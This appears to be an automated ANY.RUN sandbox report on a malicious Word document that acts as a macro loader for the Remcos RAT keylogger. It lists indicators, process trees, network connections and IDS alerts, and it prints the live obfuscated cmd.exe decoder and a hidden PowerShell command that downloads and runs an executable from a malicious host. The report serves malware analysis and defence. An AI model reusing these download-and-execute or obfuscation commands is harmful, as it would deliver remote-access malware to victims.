analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

5f67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.doc

Full analysis: https://app.any.run/tasks/96fc721e-1483-45a3-8d2e-d24d0697c165
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: June 19, 2019, 03:05:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
generated-doc
trojan
loader
rat
remcos
keylogger
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jennifer Haze, Template: Normal.dotm, Last Saved By: Jennifer Haze, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 02:44:00 2019, Last Saved Time/Date: Thu Apr 25 02:44:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

60BF475F279596141257F4351DFE3A1A

SHA1:

254F60DB098465FF712F3A39E5872A57D8D63F43

SHA256:

5F67FE74056E5042951D1E9F7288A4C2A6A5C5ECC02F06B83A1C1131F3E7579C

SSDEEP:

192:+VyZEvA+6/6rT5bk8xgNAOR61OTP60j9AOt0y8aVpXAAFl6gWbCjk:iiSY5U1g60j9dtfrpQ6WbCj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • exe.exe (PID: 180)
      • exe.exe (PID: 2728)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1644)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2964)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2964)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2560)
    • Detected logs from REMCOS RAT

      • exe.exe (PID: 2728)
    • Loads dropped or rewritten executable

      • exe.exe (PID: 180)
    • REMCOS RAT was detected

      • exe.exe (PID: 2728)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2560)
      • exe.exe (PID: 180)
    • Creates files in the user directory

      • powershell.exe (PID: 2560)
      • exe.exe (PID: 2728)
    • Application launched itself

      • exe.exe (PID: 180)
    • Writes files like Keylogger logs

      • exe.exe (PID: 2728)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2964)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 14
CharCountWithSpaces: -
Paragraphs: -
Lines: -
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: -
Words: -
Pages: 1
ModifyDate: 2019:04:25 01:44:00
CreateDate: 2019:04:25 01:44:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Jennifer Haze
Template: Normal.dotm
Keywords: -
Author: Jennifer Haze
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe exe.exe #REMCOS exe.exe

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\5f67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1644cmd.exe /v:ON /c"set done= && set x=mSC3w\Hi:nM6J-b,Nd/ED1 p(9jlsyo'aWF;uctrPhex.q%B)OT && for %H in (23,30,4,42,39,28,41,42,27,27,22,13,4,22,6,7,17,17,42,9,22,13,19,43,42,37,36,38,7,30,9,40,30,27,7,37,29,22,47,29,23,32,28,28,22,24,9,42,4,13,30,14,26,42,37,38,22,1,29,28,38,42,0,44,16,42,38,44,33,42,14,2,27,7,42,9,38,48,44,20,30,4,9,27,30,32,17,34,7,27,42,24,31,41,38,38,23,8,18,18,32,36,38,30,39,42,23,32,7,39,7,9,28,23,7,39,42,44,37,30,0,18,28,42,37,36,39,42,18,42,43,42,44,42,43,42,31,15,31,46,50,19,10,40,46,5,42,43,42,44,42,43,42,31,48,35,22,46,50,19,10,40,46,5,42,43,42,44,42,43,42,4734) DO (set done=!done!!x:~%H,1!) && if %H == 4734 call !done:~-171!"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2560powershell -w Hidden -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('http://autorepairinspire.com/secure/exe.exe','C:\Users\admin\AppData\Local\Temp\exe.exe'); C:\Users\admin\AppData\Local\Temp\exe.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
180"C:\Users\admin\AppData\Local\Temp\exe.exe"C:\Users\admin\AppData\Local\Temp\exe.exe
powershell.exe
User:
admin
Company:
Jordan Russell
Integrity Level:
MEDIUM
Description:
Inno Setup Uninstaller
Exit code:
0
Version:
51.9.0.0
2728"C:\Users\admin\AppData\Local\Temp\exe.exe"C:\Users\admin\AppData\Local\Temp\exe.exe
exe.exe
User:
admin
Company:
Jordan Russell
Integrity Level:
MEDIUM
Description:
Inno Setup Uninstaller
Version:
51.9.0.0
Total events
1 414
Read events
1 293
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDE3.tmp.cvr
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8FE8B5FFCFCE9222.TMP
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{198E30E5-DD9E-40F0-9E07-FE439EFC821A}.tmp
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4E7A5476-B07A-4CCD-8E10-721F566CADD7}.tmp
MD5:
SHA256:
2560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E67LF6HNBT6NDIW29T0L.temp
MD5:
SHA256:
2560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
180exe.exeC:\Users\admin\AppData\Local\Temp\91627215binary
MD5:124D19D1AB4B87D70B26E63CD0DD2F00
SHA256:409D418A8DC62F29B35BF7F4CA425EDC3A184C54CA1CCCCF7A5959066FEBE1BC
2560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF123224.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.docpgc
MD5:80F82C6686CA52EBB6102E269E384024
SHA256:0A69A954108FFF20D4637AC819C65764A20DAA6FA82EE74DA363CE3C3514B484
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1C3731FA96EBDD2B59DD9077E7304E50
SHA256:90231EF6597C66760A15F548BBB57E7F36AE0729947BF09439BF18DB568920C7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2560
powershell.exe
GET
200
82.221.129.17:80
http://autorepairinspire.com/secure/exe.exe
IS
executable
465 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2728
exe.exe
213.152.162.84:16098
sub2.xboxjordan.waw.pl
Global Layer B.V.
NL
malicious
2560
powershell.exe
82.221.129.17:80
autorepairinspire.com
Thor Data Center ehf
IS
malicious

DNS requests

Domain
IP
Reputation
autorepairinspire.com
  • 82.221.129.17
malicious
sub2.xboxjordan.waw.pl
  • 213.152.162.84
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2560
powershell.exe
A Network Trojan was detected
ET TROJAN Suspicious exe.exe request - possible downloader/Oficla
2560
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2560
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2560
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info